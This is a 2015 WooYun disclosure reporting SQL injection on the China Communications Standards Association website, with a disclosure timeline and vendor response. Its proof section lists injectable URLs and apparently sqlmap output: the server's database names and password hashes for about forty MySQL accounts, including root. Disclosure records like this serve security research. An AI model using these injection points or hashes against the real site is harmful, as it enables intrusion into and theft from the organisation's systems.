当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127723

漏洞标题:中国通信标准化协会主站多处高危注入

相关厂商:中国通信标准化协会

漏洞作者: MT哥

提交时间:2015-07-28 13:42

修复时间:2015-09-15 15:08

公开时间:2015-09-15 15:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-28: 细节已通知厂商并且等待厂商处理中
2015-08-01: 厂商已经确认,细节仅向厂商公开
2015-08-11: 细节向核心白帽子及相关领域专家公开
2015-08-21: 细节向普通白帽子公开
2015-08-31: 细节向实习白帽子公开
2015-09-15: 细节向公众公开

简要描述:

又是一枚凶残注入!

详细说明:

http://www.ccsa.org.cn/organization/intro.php?org=ASTAP


http://www.ccsa.org.cn/organization/index.php3?category_id=3

http://www.ccsa.org.cn/tc/meeting.php?meeting_id=5163


http://www.ccsa.org.cn/peixun/pxresult.php3?VTI-GROUP=0&name=1&term=1&unit=&start_date=&dead_date=&cert_start_date=&cert_dead_date=&B1=1

漏洞证明:

available databases [44]:
[*] article
[*] auth
[*] ccsa_access_log
[*] ccsadoc
[*] client_update
[*] customer
[*] del_mladvert
[*] del_ptpic
[*] del_pw_log
[*] del_style
[*] del_test
[*] del_tmparticle
[*] doc
[*] fileopen
[*] ftpusers
[*] good_member
[*] gsc15
[*] information_schema
[*] IOofCOM
[*] jiaoliu
[*] log
[*] logs
[*] lost+found
[*] maintain
[*] meeting
[*] ml4ccsa
[*] ml4ptsn
[*] mnogosearch
[*] mysql
[*] phpmyadmin
[*] prod
[*] prodex
[*] questionnaire
[*] sales
[*] shenbao
[*] std
[*] std_temp
[*] stdcd
[*] tc485
[*] test
[*] tlc
[*] tspc
[*] userstd
[*] vpopmail


[*] auth_rd [1]:
    password hash: 300582b60d0ce39f
[*] auth_rw [1]:
    password hash: 7363df490bd6e5ee
[*] backup [1]:
    password hash: 6360f4a4380593b6
[*] ccsa_rd [1]:
    password hash: 694bf0e84e1746b6
[*] ccsa_rw [1]:
    password hash: 0bbe89a47b7e9f94
[*] doc_rd [1]:
    password hash: 6f8c7ba26dfd93fe
[*] doc_rw [1]:
    password hash: 67c4ea1842a027a1
[*] ftp [1]:
    password hash: 654925394d80d5e4
[*] infosrv [1]:
    password hash: 1c9c80061d48e945
[*] log_rd [1]:
    password hash: 408efbf60d3c8899
[*] log_rw [1]:
    password hash: 32a437f543402d9c
[*] mailuser [1]:
    password hash: 14780cf32b1ea347
[*] maint_rw [1]:
    password hash: 7f38034b3972ae37
[*] mepadmin [1]:
    password hash: 6fc780f149d98015
[*] minfosrv [1]:
    password hash: 6c90aa2604862b9b
[*] mlog [1]:
    password hash: 06988dd331f93204
[*] mproduct [1]:
    password hash: 32099b90045157c1
[*] mptpic [1]:
    password hash: 773359240eb9a1d9
[*] mptqc [1]:
    password hash: 0107187807836006
[*] mptsn_auth [1]:
    password hash: 57cf2b7f207cc98c
[*] prod_rd [1]:
    password hash: 7ac54f89754e39ab
[*] prod_rw [1]:
    password hash: 3d4faebb32aedf8c
[*] ptpic [1]:
    password hash: 0206b55f23e2e967
[*] ptpic_rd [1]:
    password hash: 34bba4f421608fb9
[*] ptpic_rw [1]:
    password hash: 5b85aec77f441075
[*] ptqc [1]:
    password hash: 6ec627e402484936
[*] ptqc_rd [1]:
    password hash: 58eba2fc22d22204
[*] ptqc_rw [1]:
    password hash: 326fd13f1db64eba
[*] ptsn_auth [1]:
    password hash: 362f29946e86ae30
[*] readall [1]:
    password hash: 13f162af21797902
[*] root [1]:
    password hash: 0af4727b4f928228
[*] shouli [1]:
    password hash: 1f1d533a5b0f5247
[*] shouli_rd [1]:
    password hash: 472c940019929961
[*] shouli_rw [1]:
    password hash: 5bd622e73f6459c9
[*] std_rd [1]:
    password hash: 12e8cd2f1c97b82d
[*] std_rw [1]:
    password hash: 4b31b6b72a2ffa73
[*] tlcadmin [1]:
    password hash: 0c979a9e1a1a7df0
[*] tlcwebuser [1]:
    password hash: 0c979a9e1a1a7df0
[*] userstd_rw [1]:
    password hash: 57aec995239e6fc7
[*] vpopmail [1]:
    password hash: 38755f107acb1b50


修复方案:

waf+过滤

版权声明:转载请注明来源 MT哥@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-01 15:07

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报。

最新状态:

暂无

漏洞评价:

评论